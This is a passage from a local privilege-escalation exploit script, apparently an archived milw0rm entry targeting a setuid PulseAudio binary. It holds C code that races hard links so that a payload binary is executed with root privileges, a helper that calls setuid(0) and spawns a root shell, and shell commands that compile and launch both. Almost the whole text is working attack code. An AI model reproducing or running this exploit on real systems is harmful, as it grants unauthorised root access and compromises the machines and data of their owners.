#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/wait.h>
#define PULSEAUDIO_PATH "$pulseaudio"
#define SH_PATH "$workdir/sh"
#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX"
void _pause(long sec, long usec);
int main(int argc, char *argv[], char *envp[])
{
int status;
pid_t pid;
char template[sizeof(TMPDIR_TEMPLATE)];
char *tmpdir;
char hardlink[sizeof(template) + 2];
char hardlink2[sizeof(template) + 12];
srand(time(NULL));
for( ; ; )
{
snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
template[sizeof(template) - 1] = '\0';
tmpdir = mkdtemp(template);
if(tmpdir == NULL)
{
perror("mkdtemp");
return 1;
}
snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
hardlink[sizeof(hardlink) - 1] = '\0';
snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
hardlink2[sizeof(hardlink2) - 1] = '\0';
/* this fails if $workdir is a different partition */
if(link(PULSEAUDIO_PATH, hardlink) == -1)
{
perror("link");
return 1;
}
if(link(SH_PATH, hardlink2) == -1)
{
perror("link");
return 1;
}
pid = fork();
if(pid == 0)
{
char *argv[] = {hardlink, NULL};
char *envp[] = {NULL};
execve(hardlink, argv, envp);
perror("execve");
return 1;
}
if(pid == -1)
{
perror("fork");
return 1;
}
else
{
/* tweak this if exploit does not work */
_pause(0, rand() % 500);
if(unlink(hardlink) == -1)
{
perror("unlink");
return 1;
}
if(link(SH_PATH, hardlink) == -1)
{
perror("link");
return 1;
}
waitpid(pid, &status, 0);
}
if(unlink(hardlink) == -1)
{
perror("unlink");
return 1;
}
if(unlink(hardlink2) == -1)
{
perror("unlink");
return 1;
}
if(rmdir(tmpdir) == -1)
{
perror("rmdir");
return 1;
}
}
return 0;
}
void _pause(long sec, long usec)
{
struct timeval timeout;
timeout.tv_sec = sec;
timeout.tv_usec = usec;
if(select(0, NULL, NULL, NULL, &timeout) == -1)
{
perror("select");
}
}
__EOF__
cat > $workdir/sh.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
int main(int argc, char *argv[], char *envp[])
{
if(geteuid() != 0)
{
return 1;
}
setuid(0);
setgid(0);
if(fork() == 0)
{
argv[0] = "$id";
argv[1] = NULL;
execve(argv[0], argv, envp);
return 1;
}
argv[0] = "$shell";
argv[1] = NULL;
execve(argv[0], argv, envp);
return 1;
}
__EOF__
gcc -o $workdir/pa_race $workdir/pa_race.c
gcc -o $workdir/sh $workdir/sh.c
$workdir/pa_race
# milw0rm.com [2009-07-20]